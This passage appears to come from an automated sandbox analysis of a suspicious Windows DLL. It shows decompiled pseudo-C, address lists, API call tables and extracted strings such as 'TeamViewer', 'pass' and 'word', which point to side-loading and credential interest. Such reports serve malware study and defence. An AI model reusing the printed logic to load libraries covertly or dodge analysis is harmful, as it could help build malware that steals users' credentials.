                                                                                                                        									_t561 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        									wsprintfA( &_v552, "%s%s", _t561, _t447);
                                                                                                                        									_t628 = _t627 + 0x18;
                                                                                                                        									_t450 = LoadLibraryA( &_v544);
                                                                                                                        									M6F3404A4 = _t450;
                                                                                                                        									if(_t450 != 0) {
                                                                                                                        										_v936 = 0x468fa9db;
                                                                                                                        										_v932 = E6F338370;
                                                                                                                        										_v928 =  &M6F340604;
                                                                                                                        										_v924 = 0;
                                                                                                                        										E6F331FA0(_t450,  &_v936, 1, _v944 + 0x435a88);
                                                                                                                        										_t628 = _t628 + 0x10;
                                                                                                                        									}
                                                                                                                        									_t451 = E6F3331F0(0xffffffff);
                                                                                                                        									_push(0xa);
                                                                                                                        									_push(0x10);
                                                                                                                        									_push(L"15.0.");
                                                                                                                        									M6F3404EC = _t451;
                                                                                                                        									_push(E6F331D50(0x1f3ac, _t601));
                                                                                                                        									E6F338400();
                                                                                                                        									if(E6F33B820(0) != 0) {
                                                                                                                        										ExitProcess(0);
                                                                                                                        									}
                                                                                                                        									M6F340614 = 2;
                                                                                                                        									return 1;
                                                                                                                        								} else {
                                                                                                                        									goto L131;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        0x6f3396a9
                                                                                                                        0x6f3396ab
                                                                                                                        0x6f3396af
                                                                                                                        0x6f3396b4
                                                                                                                        0x6f3396bb
                                                                                                                        0x6f3396bb
                                                                                                                        0x6f3396ab
                                                                                                                        0x00000000
                                                                                                                        0x6f338528
                                                                                                                        0x6f338529
                                                                                                                        0x6f3396c0
                                                                                                                        0x6f3396cc
                                                                                                                        0x6f33852f
                                                                                                                        0x6f338537
                                                                                                                        0x6f338551
                                                                                                                        0x6f338556
                                                                                                                        0x6f338563
                                                                                                                        0x6f33856b
                                                                                                                        0x6f338578
                                                                                                                        0x6f33857b
                                                                                                                        0x6f33857b
                                                                                                                        0x6f338581
                                                                                                                        0x6f33858e
                                                                                                                        0x6f33859a
                                                                                                                        0x6f3385aa
                                                                                                                        0x6f3385bc
                                                                                                                        0x6f3385c4
                                                                                                                        0x6f3385c6
                                                                                                                        0x6f3385cc
                                                                                                                        0x6f3385d5
                                                                                                                        0x6f3385da
                                                                                                                        0x6f3385df
                                                                                                                        0x6f3385e7
                                                                                                                        0x6f3385ec
                                                                                                                        0x6f3385f6
                                                                                                                        0x6f3385fb
                                                                                                                        0x6f338601
                                                                                                                        0x6f338608
                                                                                                                        0x6f33860a
                                                                                                                        0x6f338610
                                                                                                                        0x6f338616
                                                                                                                        0x6f33861f
                                                                                                                        0x6f338624
                                                                                                                        0x6f338632
                                                                                                                        0x6f338637
                                                                                                                        0x6f33863f
                                                                                                                        0x6f33864d
                                                                                                                        0x6f338669
                                                                                                                        0x6f338671
                                                                                                                        0x6f338679
                                                                                                                        0x6f338680
                                                                                                                        0x6f338684
                                                                                                                        0x6f338690
                                                                                                                        0x6f33869b
                                                                                                                        0x6f3386a0
                                                                                                                        0x6f3386a3
                                                                                                                        0x6f3386a3
                                                                                                                        0x6f3386c8
                                                                                                                        0x6f3386d0
                                                                                                                        0x6f3386d4
                                                                                                                        0x6f3386da
                                                                                                                        0x6f3386e5
                                                                                                                        0x6f3386ea
                                                                                                                        0x6f33870f
                                                                                                                        0x6f338716
                                                                                                                        0x6f33871b
                                                                                                                        0x6f338721
                                                                                                                        0x6f338731
                                                                                                                        0x6f338752
                                                                                                                        0x6f33875d
                                                                                                                        0x6f338768
                                                                                                                        0x6f338772
                                                                                                                        0x6f338779
                                                                                                                        0x6f33877e
                                                                                                                        0x6f338784
                                                                                                                        0x6f338794
                                                                                                                        0x00000000
                                                                                                                        0x6f338796
                                                                                                                        0x6f338797
                                                                                                                        0x6f338797
                                                                                                                        0x6f338794
                                                                                                                        0x6f338731
                                                                                                                        0x6f3386ea
                                                                                                                        0x6f33879d
                                                                                                                        0x6f3387a7
                                                                                                                        0x6f3387b0
                                                                                                                        0x6f3387b5
                                                                                                                        0x6f3387bb
                                                                                                                        0x6f3387c2
                                                                                                                        0x6f3387ce
                                                                                                                        0x6f3387d3
                                                                                                                        0x6f3387da
                                                                                                                        0x6f3387ec
                                                                                                                        0x6f3387f1
                                                                                                                        0x6f3387fb
                                                                                                                        0x6f338805
                                                                                                                        0x6f338811
                                                                                                                        0x6f338816
                                                                                                                        0x6f33881b
                                                                                                                        0x6f33881e
                                                                                                                        0x6f338823
                                                                                                                        0x6f338829
                                                                                                                        0x6f33882e
                                                                                                                        0x6f33883b
                                                                                                                        0x00000000
                                                                                                                        0x6f338841
                                                                                                                        0x6f338841
                                                                                                                        0x6f338844
                                                                                                                        0x6f33884c
                                                                                                                        0x00000000
                                                                                                                        0x6f338852
                                                                                                                        0x6f33885f
                                                                                                                        0x6f338866
                                                                                                                        0x6f33886a
                                                                                                                        0x6f338878
                                                                                                                        0x6f33887a
                                                                                                                        0x6f338881
                                                                                                                        0x6f33888c
                                                                                                                        0x6f338894
                                                                                                                        0x6f338896
                                                                                                                        0x6f33889d
                                                                                                                        0x6f33889d
                                                                                                                        0x6f338894
                                                                                                                        0x6f3388a7
                                                                                                                        0x6f3388b5
                                                                                                                        0x6f3388b7
                                                                                                                        0x6f3388be
                                                                                                                        0x6f3388cb
                                                                                                                        0x6f3388d3
                                                                                                                        0x6f3388d8
                                                                                                                        0x6f3388dc
                                                                                                                        0x6f3388df
                                                                                                                        0x6f3388df
                                                                                                                        0x6f3388d8
                                                                                                                        0x6f3388e4
                                                                                                                        0x6f3388ec
                                                                                                                        0x6f3388f6
                                                                                                                        0x6f3388fb
                                                                                                                        0x6f338900
                                                                                                                        0x6f338900
                                                                                                                        0x6f338905
                                                                                                                        0x6f33890a
                                                                                                                        0x6f33890f
                                                                                                                        0x6f338912
                                                                                                                        0x6f338912
                                                                                                                        0x6f338921
                                                                                                                        0x6f338923
                                                                                                                        0x6f33892a
                                                                                                                        0x6f33892c
                                                                                                                        0x6f338943
                                                                                                                        0x6f338949
                                                                                                                        0x6f338952
                                                                                                                        0x6f338957
                                                                                                                        0x6f33895a
                                                                                                                        0x6f33895a
                                                                                                                        0x6f33896a
                                                                                                                        0x6f33897a
                                                                                                                        0x6f33897f
                                                                                                                        0x6f338994
                                                                                                                        0x6f338999
                                                                                                                        0x6f3389a4
                                                                                                                        0x6f3389a9
                                                                                                                        0x6f3389b9
                                                                                                                        0x6f3389c9
                                                                                                                        0x6f3389d9
                                                                                                                        0x6f3389e9
                                                                                                                        0x6f3389f9
                                                                                                                        0x6f338a09
                                                                                                                        0x6f338a1c
                                                                                                                        0x6f338a2c
                                                                                                                        0x6f338a3c
                                                                                                                        0x6f338a4c
                                                                                                                        0x6f338a5c
                                                                                                                        0x6f338a6c
                                                                                                                        0x6f338a7c
                                                                                                                        0x6f338a89
                                                                                                                        0x6f338a92
                                                                                                                        0x6f338aa3
                                                                                                                        0x6f338ab3
                                                                                                                        0x6f338acb
                                                                                                                        0x6f338ae3
                                                                                                                        0x6f338af3
                                                                                                                        0x6f338b0b
                                                                                                                        0x6f338b10
                                                                                                                        0x6f338b16
                                                                                                                        0x6f338b1c
                                                                                                                        0x6f338b28
                                                                                                                        0x6f338b2a
                                                                                                                        0x6f338b2f
                                                                                                                        0x6f338b39
                                                                                                                        0x6f338b3f
                                                                                                                        0x6f338b46
                                                                                                                        0x6f338b48
                                                                                                                        0x6f338b50
                                                                                                                        0x6f338b55
                                                                                                                        0x6f338b7c
                                                                                                                        0x6f338b7c
                                                                                                                        0x6f338b80
                                                                                                                        0x6f338b82
                                                                                                                        0x6f338b85
                                                                                                                        0x6f338b98
                                                                                                                        0x6f338b98
                                                                                                                        0x6f338b9b
                                                                                                                        0x6f338b9d
                                                                                                                        0x6f338ba0
                                                                                                                        0x6f338ba2
                                                                                                                        0x6f338ba2
                                                                                                                        0x6f338ba0
                                                                                                                        0x6f338b87
                                                                                                                        0x6f338b87
                                                                                                                        0x6f338b8a
                                                                                                                        0x00000000
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f339384
                                                                                                                        0x6f339389
                                                                                                                        0x6f339395
                                                                                                                        0x6f3393a6
                                                                                                                        0x6f3393a8
                                                                                                                        0x6f3393b4
                                                                                                                        0x6f3393c2
                                                                                                                        0x6f3393c8
                                                                                                                        0x6f3393cf
                                                                                                                        0x6f3393e4
                                                                                                                        0x6f3393ec
                                                                                                                        0x6f3393f4
                                                                                                                        0x6f3393fc
                                                                                                                        0x6f339400
                                                                                                                        0x6f339405
                                                                                                                        0x6f339405
                                                                                                                        0x6f33940e
                                                                                                                        0x6f339413
                                                                                                                        0x6f339428
                                                                                                                        0x6f33942a
                                                                                                                        0x6f339435
                                                                                                                        0x6f33943b
                                                                                                                        0x6f339442
                                                                                                                        0x6f339457
                                                                                                                        0x6f33945f
                                                                                                                        0x6f339467
                                                                                                                        0x6f33946f
                                                                                                                        0x6f339473
                                                                                                                        0x6f339478
                                                                                                                        0x6f339478
                                                                                                                        0x6f33947d
                                                                                                                        0x6f339485
                                                                                                                        0x6f339487
                                                                                                                        0x6f339489
                                                                                                                        0x6f339494
                                                                                                                        0x6f3394a1
                                                                                                                        0x6f3394a2
                                                                                                                        0x6f3394b2
                                                                                                                        0x6f3394b5
                                                                                                                        0x6f3394b5
                                                                                                                        0x6f3394be
                                                                                                                        0x6f3394d4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33896a
                                                                                                                        0x6f33884c
                                                                                                                        0x6f33883b
                                                                                                                        0x6f338529

                                                                                                                        APIs
                                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 6F338537
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 6F33853E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F33855A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F338563
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 6F338570
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33857B
                                                                                                                        • PathAddBackslashA.SHLWAPI(00A4DE08), ref: 6F33858E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F338597
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33859A
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000000,00000104), ref: 6F3385AF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F3385C1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3385C4
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00A56008,00000033), ref: 6F3385DA
                                                                                                                        • PathRemoveFileSpecA.SHLWAPI(00A56008), ref: 6F3385FB
                                                                                                                        • PathAddBackslashA.SHLWAPI(00A56008), ref: 6F338608
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(00A56008), ref: 6F338610
                                                                                                                        • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6F338637
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F33864D
                                                                                                                        • wsprintfA.USER32 ref: 6F338684
                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,%s%s,?,?), ref: 6F33869B
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F3386A3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A4DE08), ref: 6F3394EE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3394F1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A56008), ref: 6F3394FE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339501
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A4DF18), ref: 6F33950E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339511
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A56118), ref: 6F33951E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339521
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A53E68), ref: 6F33952E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339531
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A32C28), ref: 6F33953E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339541
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A563B0), ref: 6F33954E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339551
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A56660), ref: 6F33955E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339561
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A59868), ref: 6F33956E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339571
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A55C48), ref: 6F33957E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339581
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A45A70), ref: 6F33958E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339591
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A32D38), ref: 6F33959E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3395A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$Path$AllocBackslashFile$DirectoryExitModule$AttributesCallsCurrentDisableFolderHandleLibraryMemoryMoveNameRemoveSpecSpecialSystemThreadwsprintf
                                                                                                                        • String ID: %s%s$%s%s%s$.ini$.odt$15.0.$8?x$PBx$TeamViewer$\dx$ar.j$gd$h2$pass$pg$s$t$tx$word
                                                                                                                        • API String ID: 566710939-4171022235
                                                                                                                        • Opcode ID: d63580a75c88fa6ac627a272023eaffc7104a4d4b56db290055da347d7890f37
                                                                                                                        • Instruction ID: f999455c21c1daccb96a09235b66c358848c5818597b540dc9325df1b255b9fb
                                                                                                                        • Opcode Fuzzy Hash: d63580a75c88fa6ac627a272023eaffc7104a4d4b56db290055da347d7890f37
                                                                                                                        • Instruction Fuzzy Hash: 6BA2AEF2A08794AFDB20EF64CC84A9BBBEDEB95320F00591DF59997240DB349454CF62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00511D91
                                                                                                                        • _memset.LIBCMT ref: 00511DC6
                                                                                                                        • _memset.LIBCMT ref: 00511DD2
                                                                                                                        • socket.WS2_32(00000002,?,00000000), ref: 00511DE0
                                                                                                                        • WSAGetLastError.WS2_32 ref: 00511DF1
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • htonl.WS2_32(00000000), ref: 00511ED5
                                                                                                                        • htons.WS2_32(?), ref: 00511EF0
                                                                                                                        • WSAGetLastError.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 00511F27
                                                                                                                        Strings
                                                                                                                        • nsSocklist.Listening.Port.is.not.valid m_Port=, xrefs: 00512E71
                                                                                                                        • ncSocklist.Socket.TimedOut.With.No.Action: , xrefs: 00512D9E
                                                                                                                        • SockList.IncomingDenied.HTTP NoOfRejects: , xrefs: 00512702
                                                                                                                        • SocketListener.startListening: socket failed with error , xrefs: 00511E08
                                                                                                                        • ncSocklist.Error.On.select: , xrefs: 005124AB
                                                                                                                        • StartWT.Listening P=, xrefs: 005120E6
                                                                                                                        • SockList.InvalidUDP, xrefs: 00513253
                                                                                                                        • ?s=00000000, xrefs: 00512AC0
                                                                                                                        • SocketListener.startListening: bind failed on port , xrefs: 00512032
                                                                                                                        • GET , xrefs: 00512A85
                                                                                                                        • nsSocklist.Error.On.accept: , xrefs: 00512819
                                                                                                                        • SocketListener.startListening: bad arguments, xrefs: 005132A4
                                                                                                                        • ncSocklist.Error.reading.from.socket: , xrefs: 0051295A
                                                                                                                        • ncSocklist.Wrong.Data.on.Port.80: , xrefs: 00512CD2
                                                                                                                        • StartWT.Bind.FinalFailure P=, xrefs: 00512224
                                                                                                                        • ncSocklist.Already.gracefully.closed.socket: , xrefs: 00512A1F
                                                                                                                        • POST , xrefs: 00512A9F
                                                                                                                        • Not logged Errors:, xrefs: 0051247F
                                                                                                                        • ?s=, xrefs: 00512ADB
                                                                                                                        • NoOfAccepts: , xrefs: 005126DA
                                                                                                                        • StartWT.PortInUse P=, xrefs: 0051229A
                                                                                                                        • 127.0.0.1, xrefs: 00511EDD
                                                                                                                        • ncSocklist.No.ConnectionThread.for.SessionID: , xrefs: 00512C49
                                                                                                                        • Error: , xrefs: 0051292B
                                                                                                                        • SocketListener.startListening: setsockopt(SO_BROADCAST) failed with error , xrefs: 00513108
                                                                                                                        • SockList.IncomingDenied.TCP, xrefs: 00512EF0
                                                                                                                        • SocketListener.startListening: listen failed with error , xrefs: 005121C0, 00512F55
                                                                                                                        • with error , xrefs: 00512008
                                                                                                                        • SocketListener.startListening: setsockopt(SO_REUSEADDR) failed with error , xrefs: 00511F42
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$ErrorInitializeLast_memset$DeleteH_prolog3_H_prolog3_catch_swprintfhtonlhtonssocket
                                                                                                                        • String ID: Error: $ NoOfAccepts: $ Not logged Errors:$ with error $127.0.0.1$?s=$?s=00000000$GET $POST $SockList.IncomingDenied.HTTP NoOfRejects: $SockList.IncomingDenied.TCP$SockList.InvalidUDP$SocketListener.startListening: bad arguments$SocketListener.startListening: bind failed on port $SocketListener.startListening: listen failed with error $SocketListener.startListening: setsockopt(SO_BROADCAST) failed with error $SocketListener.startListening: setsockopt(SO_REUSEADDR) failed with error $SocketListener.startListening: socket failed with error $StartWT.Bind.FinalFailure P=$StartWT.Listening P=$StartWT.PortInUse P=$ncSocklist.Already.gracefully.closed.socket: $ncSocklist.Error.On.select: $ncSocklist.Error.reading.from.socket: $ncSocklist.No.ConnectionThread.for.SessionID: $ncSocklist.Socket.TimedOut.With.No.Action: $ncSocklist.Wrong.Data.on.Port.80: $nsSocklist.Error.On.accept: $nsSocklist.Listening.Port.is.not.valid m_Port=
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E6F336D50(intOrPtr _a8, char _a49, char _a50) {
                                                                                                                        				intOrPtr _v0;
                                                                                                                        				char _v3;
                                                                                                                        				short _v572;
                                                                                                                        				short _v580;
                                                                                                                        				short _v1092;
                                                                                                                        				char _v1364;
                                                                                                                        				char _v1372;
                                                                                                                        				char _v1864;
                                                                                                                        				short _v1872;
                                                                                                                        				short _v1884;
                                                                                                                        				char _v1896;
                                                                                                                        				char _v1900;
                                                                                                                        				struct HWND__* _v1908;
                                                                                                                        				char _v1912;
                                                                                                                        				void* _v1928;
                                                                                                                        				struct HWND__* _v1932;
                                                                                                                        				void* _v1936;
                                                                                                                        				struct tagMSG _v1964;
                                                                                                                        				char _v1972;
                                                                                                                        				struct _FILETIME _v1980;
                                                                                                                        				void* _v1984;
                                                                                                                        				struct HWND__* _v1988;
                                                                                                                        				struct HWND__* _v1992;
                                                                                                                        				struct HWND__* _v1996;
                                                                                                                        				struct HWND__* _v2000;
                                                                                                                        				void _v2004;
                                                                                                                        				void* _v2008;
                                                                                                                        				void* _v2020;
                                                                                                                        				void* _v2024;
                                                                                                                        				void* _v2028;
                                                                                                                        				char _v2032;
                                                                                                                        				void* _v2036;
                                                                                                                        				void* _v2040;
                                                                                                                        				signed short _v2044;
                                                                                                                        				signed int _v2048;
                                                                                                                        				void* _v2052;
                                                                                                                        				char _v2068;
                                                                                                                        				void* _v2072;
                                                                                                                        				char _v2074;
                                                                                                                        				char _v2076;
                                                                                                                        				signed int _v2084;
                                                                                                                        				char _v2088;
                                                                                                                        				long _v2092;
                                                                                                                        				char _v2094;
                                                                                                                        				char _v2096;
                                                                                                                        				intOrPtr _v2100;
                                                                                                                        				struct HWND__* _v2104;
                                                                                                                        				void* _v2120;
                                                                                                                        				int _v2124;
                                                                                                                        				void* _t244;
                                                                                                                        				signed int _t251;
                                                                                                                        				signed int _t252;
                                                                                                                        				char _t254;
                                                                                                                        				WCHAR* _t255;
                                                                                                                        				int _t262;
                                                                                                                        				int _t263;
                                                                                                                        				void* _t269;
                                                                                                                        				void* _t270;
                                                                                                                        				WCHAR* _t271;
                                                                                                                        				WCHAR* _t273;
                                                                                                                        				long _t274;
                                                                                                                        				char _t275;
                                                                                                                        				struct HWND__* _t276;
                                                                                                                        				char _t281;
                                                                                                                        				char _t284;
                                                                                                                        				void* _t288;
                                                                                                                        				CHAR* _t293;
                                                                                                                        				int _t294;
                                                                                                                        				char _t295;
                                                                                                                        				signed int _t296;
                                                                                                                        				int _t298;
                                                                                                                        				void* _t299;
                                                                                                                        				signed char _t302;
                                                                                                                        				signed int _t303;
                                                                                                                        				CHAR* _t314;
                                                                                                                        				signed int _t316;
                                                                                                                        				signed int _t317;
                                                                                                                        				void* _t322;
                                                                                                                        				intOrPtr _t324;
                                                                                                                        				void* _t329;
                                                                                                                        				void* _t334;
                                                                                                                        				char _t340;
                                                                                                                        				char _t344;
                                                                                                                        				long _t346;
                                                                                                                        				struct HWND__* _t370;
                                                                                                                        				char _t373;
                                                                                                                        				intOrPtr _t377;
                                                                                                                        				char _t379;
                                                                                                                        				void* _t380;
                                                                                                                        				signed int _t383;
                                                                                                                        				void* _t386;
                                                                                                                        				CHAR* _t395;
                                                                                                                        				struct HWND__* _t406;
                                                                                                                        				struct HWND__* _t407;
                                                                                                                        				signed int _t417;
                                                                                                                        				signed int _t422;
                                                                                                                        				signed short _t423;
                                                                                                                        				signed int _t424;
                                                                                                                        				CHAR* _t442;
                                                                                                                        				CHAR* _t443;
                                                                                                                        				CHAR* _t445;
                                                                                                                        				void* _t467;
                                                                                                                        				void* _t468;
                                                                                                                        				void* _t469;
                                                                                                                        				int _t470;
                                                                                                                        				void* _t471;
                                                                                                                        				struct HWND__* _t472;
                                                                                                                        				void* _t473;
                                                                                                                        				void* _t474;
                                                                                                                        				void _t475;
                                                                                                                        				intOrPtr* _t476;
                                                                                                                        				void* _t477;
                                                                                                                        				CHAR* _t478;
                                                                                                                        				void* _t479;
                                                                                                                        				void* _t481;
                                                                                                                        				void* _t486;
                                                                                                                        				signed short _t487;
                                                                                                                        				void* _t488;
                                                                                                                        				void* _t489;
                                                                                                                        				void* _t490;
                                                                                                                        				CHAR* _t492;
                                                                                                                        				char* _t493;
                                                                                                                        				char* _t494;
                                                                                                                        				void* _t495;
                                                                                                                        				signed int _t496;
                                                                                                                        				void* _t498;
                                                                                                                        				void* _t499;
                                                                                                                        				void* _t500;
                                                                                                                        				void* _t501;
                                                                                                                        				void* _t503;
                                                                                                                        				void* _t504;
                                                                                                                        				void* _t505;
                                                                                                                        				void* _t513;
                                                                                                                        				void* _t514;
                                                                                                                        				void* _t523;
                                                                                                                        				void* _t535;
                                                                                                                        
                                                                                                                        				_t498 = (_t496 & 0xfffffff8) - 0x800;
                                                                                                                        				_push(0x14);
                                                                                                                        				_push( &_v1980);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t370 = 0;
                                                                                                                        				_t244 = VirtualAlloc(0, 0x1000, 0x1000, 4); // executed
                                                                                                                        				_t481 = _t244;
                                                                                                                        				if(_t481 == 0) {
                                                                                                                        					L91:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_push(0x14);
                                                                                                                        					_push( &_v1864);
                                                                                                                        					L6F33C2EE();
                                                                                                                        					GetLocaleInfoW(0x400, 0x5a,  &_v1872, 9);
                                                                                                                        					CharLowerW( &_v1872);
                                                                                                                        					_push(0x9c);
                                                                                                                        					_push(0x6f3403a0);
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_push( &_v2036);
                                                                                                                        					_push( &_v2032);
                                                                                                                        					_push( &_v2040);
                                                                                                                        					 *0x6f3403a0 = 0x9c;
                                                                                                                        					_v2040 = 0;
                                                                                                                        					_v2032 = 0;
                                                                                                                        					_v2036 = 0;
                                                                                                                        					L6F33C330();
                                                                                                                        					 *0x6f3403ac = _v2048 & 0x0000ffff;
                                                                                                                        					_t251 = M6F3404A8; // 0x6f240000
                                                                                                                        					 *0x6f3403a4 = _v2052;
                                                                                                                        					 *0x6f3403a8 = _v2044;
                                                                                                                        					 *0x6f34043a = 4;
                                                                                                                        					if(_t251 != 0) {
                                                                                                                        						_push(0x435a88);
                                                                                                                        						_push(1);
                                                                                                                        						_t417 =  &_v2032;
                                                                                                                        						_push(_t417);
                                                                                                                        						_push(_t251);
                                                                                                                        						_v2032 = 0x5e6f0892;
                                                                                                                        						_v2028 = 0;
                                                                                                                        						_v2024 = 0;
                                                                                                                        						_v2020 = 0;
                                                                                                                        						E6F331DB0();
                                                                                                                        						_t251 = _v2020;
                                                                                                                        						_t498 = _t498 + 0x10;
                                                                                                                        						if(_t251 != 0) {
                                                                                                                        							_v2072 = 0;
                                                                                                                        							_t251 =  *_t251(0, 0x65,  &_v2072); // executed
                                                                                                                        							if(_t251 == 0) {
                                                                                                                        								_t251 = _v2084;
                                                                                                                        								if(_t251 != 0) {
                                                                                                                        									_t251 =  *(_t251 + 0x10) & 0x00001000;
